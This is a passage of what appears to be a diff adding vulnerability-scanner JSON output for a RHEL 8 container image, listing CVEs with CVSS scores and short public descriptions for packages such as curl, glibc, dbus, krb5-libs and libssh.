"7.61.1-14.el8_3.1", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-8285", + "vendor_data": [], + "vuln": "CVE-2020-8285", + "extra": { + "description": "curl 7.21.0 to and including 7.73.0 is vulnerable to uncontrolled recursion due to a stack overflow issue in FTP wildcard match parsing.", + "id": "CVE-2020-8285", + "link": "https://access.redhat.com/security/cve/CVE-2020-8285", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 5, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 7.5, + "base_severity": "High", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2020-8285" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 7.5, + "exploitability_score": 3.9, + "impact_score": 3.6 + }, + "id": "CVE-2020-8286" + } + ], + "package": "curl-7.61.1-14.el8_3.1", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "curl", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "7.61.1-14.el8_3.1", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-8286", + "vendor_data": [], + "vuln": "CVE-2020-8286", + "extra": { + "description": "curl 7.41.0 through 7.73.0 is vulnerable to an improper check for certificate revocation due to insufficient verification of the OCSP response.", + "id": "CVE-2020-8286", + "link": "https://access.redhat.com/security/cve/CVE-2020-8286", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "NONE", + "base_score": 5, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "PARTIAL" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:P/A:N", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "NONE", + "base_score": 7.5, + "base_severity": "High", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 3.6, + "integrity_impact": "HIGH", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "version": "3.1" + }, + "id": "CVE-2020-8286" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [], + "package": "dbus-1.12.8-11.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "dbus", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "1.12.8-11.el8", + "severity": "Low", + "url": "https://access.redhat.com/security/cve/CVE-2020-35512", + "vendor_data": [], + "vuln": "CVE-2020-35512", + "extra": { + "description": "none", + "id": "CVE-2020-35512", + "link": "https://access.redhat.com/security/cve/CVE-2020-35512", + "namespace": "rhel:8", + "nvd_data": [], + "references": null, + "severity": "Low", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [], + "package": "dbus-common-1.12.8-11.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "dbus-common", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "1.12.8-11.el8", + "severity": "Low", + "url": "https://access.redhat.com/security/cve/CVE-2020-35512", + "vendor_data": [], + "vuln": "CVE-2020-35512", + "extra": { + "description": "none", + "id": "CVE-2020-35512", + "link": "https://access.redhat.com/security/cve/CVE-2020-35512", + "namespace": "rhel:8", + "nvd_data": [], + "references": null, + "severity": "Low", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [], + "package": "dbus-daemon-1.12.8-11.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "dbus-daemon", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "1.12.8-11.el8", + "severity": "Low", + "url": "https://access.redhat.com/security/cve/CVE-2020-35512", + "vendor_data": [], + "vuln": "CVE-2020-35512", + "extra": { + "description": "none", + "id": "CVE-2020-35512", + "link": "https://access.redhat.com/security/cve/CVE-2020-35512", + "namespace": "rhel:8", + "nvd_data": [], + "references": null, + "severity": "Low", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [], + "package": "dbus-libs-1.12.8-11.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "dbus-libs", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "1.12.8-11.el8", + "severity": "Low", + "url": "https://access.redhat.com/security/cve/CVE-2020-35512", + "vendor_data": [], + "vuln": "CVE-2020-35512", + "extra": { + "description": "none", + "id": "CVE-2020-35512", + "link": "https://access.redhat.com/security/cve/CVE-2020-35512", + "namespace": "rhel:8", + "nvd_data": [], + "references": null, + "severity": "Low", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [], + "package": "dbus-tools-1.12.8-11.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "dbus-tools", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "1.12.8-11.el8", + "severity": "Low", + "url": "https://access.redhat.com/security/cve/CVE-2020-35512", + "vendor_data": [], + "vuln": "CVE-2020-35512", + "extra": { + "description": "none", + "id": "CVE-2020-35512", + "link": "https://access.redhat.com/security/cve/CVE-2020-35512", + "namespace": "rhel:8", + "nvd_data": [], + "references": null, + "severity": "Low", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 7.1, + "exploitability_score": 8.6, + "impact_score": 6.9 + }, + "cvss_v3": { + "base_score": 5.9, + "exploitability_score": 2.2, + "impact_score": 3.6 + }, + "id": "CVE-2019-25013" + } + ], + "package": "glibc-2.28-127.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "glibc", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "2.28-127.el8", + "severity": "High", + "url": "https://access.redhat.com/security/cve/CVE-2019-25013", + "vendor_data": [], + "vuln": "CVE-2019-25013", + "extra": { + "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", + "id": "CVE-2019-25013", + "link": "https://access.redhat.com/security/cve/CVE-2019-25013", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "MEDIUM", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "COMPLETE", + "base_score": 7.1, + "confidentiality_impact": "NONE", + "exploitability_score": 8.6, + "impact_score": 6.9, + "integrity_impact": "NONE" + }, + "severity": "High", + "vector_string": "AV:N/AC:M/Au:N/C:N/I:N/A:C", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "HIGH", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 5.9, + "base_severity": "Medium", + "confidentiality_impact": "NONE", + "exploitability_score": 2.2, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2019-25013" + } + ], + "references": null, + "severity": "High", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [], + "package": "glibc-2.28-127.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "glibc", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "2.28-127.el8", + "severity": "Low", + "url": "https://access.redhat.com/security/cve/CVE-2020-27618", + "vendor_data": [], + "vuln": "CVE-2020-27618", + "extra": { + "description": "none", + "id": "CVE-2020-27618", + "link": "https://access.redhat.com/security/cve/CVE-2020-27618", + "namespace": "rhel:8", + "nvd_data": [], + "references": null, + "severity": "Low", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 7.1, + "exploitability_score": 8.6, + "impact_score": 6.9 + }, + "cvss_v3": { + "base_score": 5.9, + "exploitability_score": 2.2, + "impact_score": 3.6 + }, + "id": "CVE-2019-25013" + } + ], + "package": "glibc-common-2.28-127.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "glibc-common", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "2.28-127.el8", + "severity": "High", + "url": "https://access.redhat.com/security/cve/CVE-2019-25013", + "vendor_data": [], + "vuln": "CVE-2019-25013", + "extra": { + "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", + "id": "CVE-2019-25013", + "link": "https://access.redhat.com/security/cve/CVE-2019-25013", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "MEDIUM", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "COMPLETE", + "base_score": 7.1, + "confidentiality_impact": "NONE", + "exploitability_score": 8.6, + "impact_score": 6.9, + "integrity_impact": "NONE" + }, + "severity": "High", + "vector_string": "AV:N/AC:M/Au:N/C:N/I:N/A:C", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "HIGH", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 5.9, + "base_severity": "Medium", + "confidentiality_impact": "NONE", + "exploitability_score": 2.2, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2019-25013" + } + ], + "references": null, + "severity": "High", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [], + "package": "glibc-common-2.28-127.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "glibc-common", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "2.28-127.el8", + "severity": "Low", + "url": "https://access.redhat.com/security/cve/CVE-2020-27618", + "vendor_data": [], + "vuln": "CVE-2020-27618", + "extra": { + "description": "none", + "id": "CVE-2020-27618", + "link": "https://access.redhat.com/security/cve/CVE-2020-27618", + "namespace": "rhel:8", + "nvd_data": [], + "references": null, + "severity": "Low", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 7.1, + "exploitability_score": 8.6, + "impact_score": 6.9 + }, + "cvss_v3": { + "base_score": 5.9, + "exploitability_score": 2.2, + "impact_score": 3.6 + }, + "id": "CVE-2019-25013" + } + ], + "package": "glibc-minimal-langpack-2.28-127.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "glibc-minimal-langpack", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "2.28-127.el8", + "severity": "High", + "url": "https://access.redhat.com/security/cve/CVE-2019-25013", + "vendor_data": [], + "vuln": "CVE-2019-25013", + "extra": { + "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", + "id": "CVE-2019-25013", + "link": "https://access.redhat.com/security/cve/CVE-2019-25013", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "MEDIUM", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "COMPLETE", + "base_score": 7.1, + "confidentiality_impact": "NONE", + "exploitability_score": 8.6, + "impact_score": 6.9, + "integrity_impact": "NONE" + }, + "severity": "High", + "vector_string": "AV:N/AC:M/Au:N/C:N/I:N/A:C", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "HIGH", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 5.9, + "base_severity": "Medium", + "confidentiality_impact": "NONE", + "exploitability_score": 2.2, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2019-25013" + } + ], + "references": null, + "severity": "High", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [], + "package": "glibc-minimal-langpack-2.28-127.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "glibc-minimal-langpack", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "2.28-127.el8", + "severity": "Low", + "url": "https://access.redhat.com/security/cve/CVE-2020-27618", + "vendor_data": [], + "vuln": "CVE-2020-27618", + "extra": { + "description": "none", + "id": "CVE-2020-27618", + "link": "https://access.redhat.com/security/cve/CVE-2020-27618", + "namespace": "rhel:8", + "nvd_data": [], + "references": null, + "severity": "Low", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 7.5, + "exploitability_score": 3.9, + "impact_score": 3.6 + }, + "id": "CVE-2020-28196" + } + ], + "package": "krb5-libs-1.18.2-5.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "krb5-libs", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "1.18.2-5.el8", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-28196", + "vendor_data": [], + "vuln": "CVE-2020-28196", + "extra": { + "description": "MIT Kerberos 5 (aka krb5) before 1.17.2 and 1.18.x before 1.18.3 allows unbounded recursion via an ASN.1-encoded Kerberos message because the lib/krb5/asn.1/asn1_encode.c support for BER indefinite lengths lacks a recursion limit.", + "id": "CVE-2020-28196", + "link": "https://access.redhat.com/security/cve/CVE-2020-28196", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 5, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 7.5, + "base_severity": "High", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2020-28196" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 7.5, + "exploitability_score": 3.9, + "impact_score": 3.6 + }, + "id": "CVE-2020-8231" + } + ], + "package": "libcurl-7.61.1-14.el8_3.1", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "libcurl", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "7.61.1-14.el8_3.1", + "severity": "Low", + "url": "https://access.redhat.com/security/cve/CVE-2020-8231", + "vendor_data": [], + "vuln": "CVE-2020-8231", + "extra": { + "description": "Due to use of a dangling pointer, libcurl 7.29.0 through 7.71.1 can use the wrong connection when sending data.", + "id": "CVE-2020-8231", + "link": "https://access.redhat.com/security/cve/CVE-2020-8231", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "NONE", + "base_score": 5, + "confidentiality_impact": "PARTIAL", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:P/I:N/A:N", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "NONE", + "base_score": 7.5, + "base_severity": "High", + "confidentiality_impact": "HIGH", + "exploitability_score": 3.9, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "version": "3.1" + }, + "id": "CVE-2020-8231" + } + ], + "references": null, + "severity": "Low", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 4.3, + "exploitability_score": 8.6, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 3.7, + "exploitability_score": 2.2, + "impact_score": 1.4 + }, + "id": "CVE-2020-8284" + } + ], + "package": "libcurl-7.61.1-14.el8_3.1", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "libcurl", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "7.61.1-14.el8_3.1", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-8284", + "vendor_data": [], + "vuln": "CVE-2020-8284", + "extra": { + "description": "A malicious server can use the FTP PASV response to trick curl 7.73.0 and earlier into connecting back to a given IP address and port, and this way potentially make curl extract information about services that are otherwise private and not disclosed, for example doing port scanning and service banner extractions.", + "id": "CVE-2020-8284", + "link": "https://access.redhat.com/security/cve/CVE-2020-8284", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "MEDIUM", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "NONE", + "base_score": 4.3, + "confidentiality_impact": "PARTIAL", + "exploitability_score": 8.6, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:M/Au:N/C:P/I:N/A:N", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "HIGH", + "attack_vector": "NETWORK", + "availability_impact": "NONE", + "base_score": 3.7, + "base_severity": "Low", + "confidentiality_impact": "LOW", + "exploitability_score": 2.2, + "impact_score": 1.4, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "version": "3.1" + }, + "id": "CVE-2020-8284" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 7.5, + "exploitability_score": 3.9, + "impact_score": 3.6 + }, + "id": "CVE-2020-8285" + } + ], + "package": "libcurl-7.61.1-14.el8_3.1", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "libcurl", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "7.61.1-14.el8_3.1", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-8285", + "vendor_data": [], + "vuln": "CVE-2020-8285", + "extra": { + "description": "curl 7.21.0 to and including 7.73.0 is vulnerable to uncontrolled recursion due to a stack overflow issue in FTP wildcard match parsing.", + "id": "CVE-2020-8285", + "link": "https://access.redhat.com/security/cve/CVE-2020-8285", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 5, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 7.5, + "base_severity": "High", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2020-8285" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 5, + "exploitability_score": 10, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 7.5, + "exploitability_score": 3.9, + "impact_score": 3.6 + }, + "id": "CVE-2020-8286" + } + ], + "package": "libcurl-7.61.1-14.el8_3.1", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "libcurl", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "7.61.1-14.el8_3.1", + "severity": "Medium", + "url": "https://access.redhat.com/security/cve/CVE-2020-8286", + "vendor_data": [], + "vuln": "CVE-2020-8286", + "extra": { + "description": "curl 7.41.0 through 7.73.0 is vulnerable to an improper check for certificate revocation due to insufficient verification of the OCSP response.", + "id": "CVE-2020-8286", + "link": "https://access.redhat.com/security/cve/CVE-2020-8286", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "LOW", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "NONE", + "base_score": 5, + "confidentiality_impact": "NONE", + "exploitability_score": 10, + "impact_score": 2.9, + "integrity_impact": "PARTIAL" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:L/Au:N/C:N/I:P/A:N", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "LOW", + "attack_vector": "NETWORK", + "availability_impact": "NONE", + "base_score": 7.5, + "base_severity": "High", + "confidentiality_impact": "NONE", + "exploitability_score": 3.9, + "impact_score": 3.6, + "integrity_impact": "HIGH", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "version": "3.1" + }, + "id": "CVE-2020-8286" + } + ], + "references": null, + "severity": "Medium", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 4.3, + "exploitability_score": 8.6, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 5.9, + "exploitability_score": 2.2, + "impact_score": 3.6 + }, + "id": "CVE-2020-16135" + } + ], + "package": "libssh-0.9.4-2.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "libssh", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "0.9.4-2.el8", + "severity": "Low", + "url": "https://access.redhat.com/security/cve/CVE-2020-16135", + "vendor_data": [], + "vuln": "CVE-2020-16135", + "extra": { + "description": "libssh 0.9.4 has a NULL pointer dereference in tftpserver.c if ssh_buffer_new returns NULL.", + "id": "CVE-2020-16135", + "link": "https://access.redhat.com/security/cve/CVE-2020-16135", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "MEDIUM", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 4.3, + "confidentiality_impact": "NONE", + "exploitability_score": 8.6, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:M/Au:N/C:N/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "HIGH", + "attack_vector": "NETWORK", + "availability_impact": "HIGH", + "base_score": 5.9, + "base_severity": "Medium", + "confidentiality_impact": "NONE", + "exploitability_score": 2.2, + "impact_score": 3.6, + "integrity_impact": "NONE", + "privileges_required": "NONE", + "scope": "UNCHANGED", + "user_interaction": "NONE" + }, + "vector_string": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + "id": "CVE-2020-16135" + } + ], + "references": null, + "severity": "Low", + "vendor_data": [] + } + }, + { + "feed": "vulnerabilities", + "feed_group": "rhel:8", + "fix": "None", + "inherited_from_base": true, + "nvd_data": [ + { + "cvss_v2": { + "base_score": 4.3, + "exploitability_score": 8.6, + "impact_score": 2.9 + }, + "cvss_v3": { + "base_score": 5.9, + "exploitability_score": 2.2, + "impact_score": 3.6 + }, + "id": "CVE-2020-16135" + } + ], + "package": "libssh-config-0.9.4-2.el8", + "package_cpe": "None", + "package_cpe23": "None", + "package_name": "libssh-config", + "package_path": "pkgdb", + "package_type": "rpm", + "package_version": "0.9.4-2.el8", + "severity": "Low", + "url": "https://access.redhat.com/security/cve/CVE-2020-16135", + "vendor_data": [], + "vuln": "CVE-2020-16135", + "extra": { + "description": "libssh 0.9.4 has a NULL pointer dereference in tftpserver.c if ssh_buffer_new returns NULL.", + "id": "CVE-2020-16135", + "link": "https://access.redhat.com/security/cve/CVE-2020-16135", + "namespace": "rhel:8", + "nvd_data": [ + { + "cvss_v2": { + "additional_information": { + "ac_insuf_info": false, + "obtain_all_privilege": false, + "obtain_other_privilege": false, + "obtain_user_privilege": false, + "user_interaction_required": false + }, + "base_metrics": { + "access_complexity": "MEDIUM", + "access_vector": "NETWORK", + "authentication": "NONE", + "availability_impact": "PARTIAL", + "base_score": 4.3, + "confidentiality_impact": "NONE", + "exploitability_score": 8.6, + "impact_score": 2.9, + "integrity_impact": "NONE" + }, + "severity": "Medium", + "vector_string": "AV:N/AC:M/Au:N/C:N/I:N/A:P", + "version": "2.0" + }, + "cvss_v3": { + "base_metrics": { + "attack_complexity": "HIGH", + "attack_vector": "NETWORK", + 